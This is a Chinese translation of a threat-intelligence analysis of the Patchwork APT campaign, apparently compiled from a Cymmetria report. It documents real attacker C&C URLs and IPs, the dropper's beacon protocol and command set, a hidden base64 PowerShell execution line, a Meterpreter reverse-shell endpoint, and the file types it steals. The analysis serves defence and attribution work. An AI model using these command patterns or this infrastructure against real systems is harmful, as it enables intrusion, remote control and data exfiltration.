三、技術(shù)分析

工具部署

攻擊載體：

攻擊載體是一個(gè)以PPS為附件的網(wǎng)絡(luò)釣魚(yú)郵件，嵌入漏洞 CVE-2014-4114  的利用代碼。漏洞利用代碼執(zhí)行之后釋放可執(zhí)行文件和Windows驅(qū)動(dòng)程序描述文件INF。

攻擊者把以下兩個(gè)文件嵌入OLE實(shí)體中并釋放到受害者主機(jī)：

DROPPER木馬程序：

sysvolinfo.exe程序是攻擊者第一階段的有效載荷（另一個(gè)程序是uplv1032 .exe），其目的是為了提升權(quán)限、篩選數(shù)據(jù)，從網(wǎng)絡(luò)下載執(zhí)行powersploit發(fā)起的程序和命令。通過(guò)安裝Meterpreter，攻擊者可以在受感染主機(jī)內(nèi)發(fā)起遠(yuǎn)程控制命令。

sysvolinfo.exe代碼本身是利用編譯工具AutoIt編譯的，其代碼的一個(gè)重要部分抄襲于黑客論壇“ indetectables ”。

C&C通信：

當(dāng)黑客工具開(kāi)始運(yùn)行之后，第一步就是與C&C服務(wù)器進(jìn)行確認(rèn)連接，靜待命令，以下就是對(duì)C&C連接協(xié)議的分析：

發(fā)起遠(yuǎn)程連接請(qǐng)求：

  --  http://212.129.13.110/dropper.php?profile=+ $ComputerID

用以下變量作為發(fā)送參數(shù)：

   --  ddager, r1, r2, r3, r4, r5, r6.

 返回變量和結(jié)果：

 --  “$sdata|$payload”

可用命令解釋?zhuān)?/p>

Command ID	Command explanation
“1”	調(diào)試服務(wù)器遠(yuǎn)程狀態(tài)如 “[+] ServFlag : Disabled” ，也可以什么都不做
“2”	如果此命令在之前沒(méi)被執(zhí)行過(guò), 以PowerShell腳本方式執(zhí)行： powershell -nop -wind hidden -noni -enc ” & $PAYLOAD
“3”	重置腳本內(nèi)部狀態(tài)，忽略先前執(zhí)行的“2”號(hào)命令，再次執(zhí)行“2”號(hào)命令。
“4”	退出腳本
“5”	以base64加密payload執(zhí)行_emorhc function
“6”	以base64加密payload為變量執(zhí)行_getnewver function
“7”	以base64加密payload為變量執(zhí)行_instcust function
“8”	通過(guò)CMD方式執(zhí)行base64加密payload ，把結(jié)果保存于r5

當(dāng)受害主機(jī)狀態(tài)命令發(fā)送到控制服務(wù)器后，黑客程序繼續(xù)以“TotalSecurity”字符串目標(biāo)掃描整個(gè)“Program Files”目錄，這是“360 Total Security”安全軟件的安裝目錄。(360 Total Security 是360的國(guó)際版）

黑客軟件以”Baidu Software Update”為文件夾偽裝自身進(jìn)入系統(tǒng)啟動(dòng)目錄（HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run）。然后，它又向控制服務(wù)器發(fā)送另一個(gè)命令，之后，開(kāi)始掃描計(jì)算機(jī)中的所有固定驅(qū)動(dòng)器磁盤(pán)，以尋找以下后綴名文件：

 之后上傳所有文件至服務(wù)器：

http://212[.]129.13.110/update-request.php?profile= 

在對(duì)黑客工具進(jìn)行反編譯后，發(fā)現(xiàn)了其功能調(diào)用中包含了一個(gè)有趣的PDB文件：

“C:\Users\Kanishk\Documents\VisualStudio 2015\Projects\ConsoleApplication1\ConsoleApplication1\obj\Debug\ConsoleApplication1.pdb”

提權(quán)操作:

經(jīng)過(guò)前階段描述可知，攻擊載體使用了WINDOWS7系統(tǒng)中尚未打補(bǔ)丁的UAC繞過(guò)漏洞（被稱(chēng)為UACME ），這可以讓攻擊者以管理員身份執(zhí)行操作。

shellcode執(zhí)行:

當(dāng)AutoIt 腳本惡意軟件從 $sdata 中接收到“2”號(hào)命令的心跳后（這似乎是最常見(jiàn)的情況），便以base64加密方式執(zhí)行命令：

 powershell -nop -wind hidden -noni -enc

我們觀(guān)察到base64加密的payload是powershell腳本方式的shellcode，通過(guò)Meterpreter 進(jìn)行https反向遠(yuǎn)程連接。

 反向HTTPS Meterpreter 連接：

AutoIt腳本提權(quán)并執(zhí)行一個(gè)PowerShell的反向Meterpreter 連接腳本，而且這個(gè)腳本看起來(lái)是通過(guò)一個(gè)在線(xiàn)博客復(fù)制而來(lái)的

Meterpreter用以下參數(shù)進(jìn)行連接：

 

第二階段的攻擊載體：

該階段的攻擊工具只有在攻擊者執(zhí)行Meterpreter連接，并確定目標(biāo)主機(jī)具有價(jià)值之后，才會(huì)運(yùn)行部署。我們發(fā)現(xiàn)這個(gè)攻擊載體為7zip.exe，但它有時(shí)候也為ndcrypt.exe和nd.exe。

7zip.exe 16 進(jìn)制代碼

這個(gè)程序的很多代碼都來(lái)源于GitHub的一個(gè)公開(kāi)代碼庫(kù) 。

脫殼之后，程序模塊執(zhí)行以下動(dòng)作：

（1）為了在電腦關(guān)機(jī)或重啟之后能繼續(xù)保持入侵狀態(tài)，攻擊載體程序在系統(tǒng)目錄下復(fù)制自身并重命名為netmon.exe，并以自啟動(dòng)服務(wù) Net Monitor 運(yùn)行。

                       C:\Windows\SysWOW64\netmon.exe     — 以 7zip.exe/netmon.exe 運(yùn)行的64位程序；

（2）執(zhí)行一個(gè)固定磁盤(pán)的掃描線(xiàn)程和文件篩選程序（但不會(huì)搜索網(wǎng)絡(luò)驅(qū)動(dòng)器和USB設(shè)備）

          • 另一個(gè)線(xiàn)程執(zhí)行文件上傳功能：         

  http://212[.]83.191.156/http/up.php.

         • 另一個(gè)線(xiàn)程下載可執(zhí)行文件：

  http://212[.]83.191.156/http/down.php 

四、其它屬性

1 PPS文件時(shí)間編輯分析：

 經(jīng)過(guò)對(duì)PPS文件的提取分析發(fā)現(xiàn)，這些PPS文件在一天當(dāng)中的不同時(shí)段都被經(jīng)過(guò)修改：

2 C&C 遠(yuǎn)程控制服務(wù)器活動(dòng)時(shí)間：

C&C服務(wù)器的活動(dòng)不僅在于單獨(dú)的幾個(gè)小時(shí)之間，還在于每周的每天，通過(guò)對(duì)每天的時(shí)間區(qū)間進(jìn)行描述之后，我們可以發(fā)現(xiàn)不同的模式，例如，每周的周日活動(dòng)較多，周六較少。另外，攻擊活動(dòng)不早于凌晨2點(diǎn)，不晚于上午11點(diǎn)，除了某個(gè)周日之外。“攻擊工作時(shí)間”圖如下：

 

3 域名注冊(cè)時(shí)間：

攻擊活動(dòng)使用的惡意域名注冊(cè)時(shí)間只在每周的特定幾天，而且注冊(cè)時(shí)間都介于凌晨3點(diǎn)到下午15點(diǎn)之間：

五、總結(jié)：

Patchwork APT 是一個(gè)非常成功的有針對(duì)性的網(wǎng)絡(luò)攻擊，令人驚訝的是自去年12月之前，它一直未被發(fā)現(xiàn)。

其高度復(fù)雜的操作與其具有的低技術(shù)含量形成鮮明的矛盾對(duì)比，避免昂貴的開(kāi)發(fā)工具而選擇開(kāi)源低廉的代碼作為滲透工具，這也許是一種攻擊趨勢(shì)，也是一種避免被發(fā)現(xiàn)的手段；

根據(jù)我們所掌握的信息，攻擊者有可能是親印度或印度人。但就像我們的CEO Gadi Gadi Evron在內(nèi)部討論時(shí)所說(shuō)的：“也有另一種可能性，有可能是其他偽裝成印度人的攻擊者，因?yàn)樵诰W(wǎng)絡(luò)世界里，好像根本就沒(méi)有任何確切的證據(jù)來(lái)支撐說(shuō)明，這只是我們自己的觀(guān)點(diǎn)。”

不像其它國(guó)家發(fā)起的APT攻擊，印度的網(wǎng)絡(luò)間諜活動(dòng)一直都處于平靜狀態(tài)，如果攻擊者確實(shí)是親印度或印度人，那么這是非常值得注意的情況。

***** 文章根據(jù)Cymmetria 報(bào)告原文編譯：Cymmetria - Unveiling_Patchwork

*****后記：在Cymmetria發(fā)布分析報(bào)告的同時(shí)，卡巴斯基實(shí)驗(yàn)室也發(fā)布了名為《Dropping Elephant網(wǎng)絡(luò)犯罪組織肆意攻擊多國(guó)政府和外交機(jī)構(gòu)》的報(bào)告，報(bào)告中命名的Dropping Elephant APT 與Cymmetria發(fā)現(xiàn)的 Patchwork APT 高度相似。

       • LHOST=45.43.192.172

       • LPORT=8443 

*.doc

*.pdf

*.csv

*.ppt

*.docx

*.pst

*.xls

*.xlsx

*.pptx 

屬性:

ComputerID=BASE64ENCODE(“$USERNAME@$COMPUTERNAME”)

ddager= Isstartup registry key added (Bool)

r1=BASE64ENCODE(result of OSVersion macro, e.g. WIN_7)

r2=BASE64ENCODE(result of OSArch macro, e.g. X64)

r3=BASE64ENCODE(trojan version, 1.1 in our sample)

r4=BASE64ENCODE(Does the SQLite database folder ( @UserProfileDir &“\AppData\Local\Google\Chrome\User Data\Default\”) exist (1) or not (0))

r5=BASE64ENCODE(stdout of last cmd command)

r6=BASE64ENCODE(1 if running as administrator, 0 if not)

   •  Driver.inf

   •  Sysvolinfo.exe

    http://212.129.13.110/dropper.php?profile=<base64of [username@computername]>

    https://45.43.192.172:8443/OxGN 

最新評(píng)論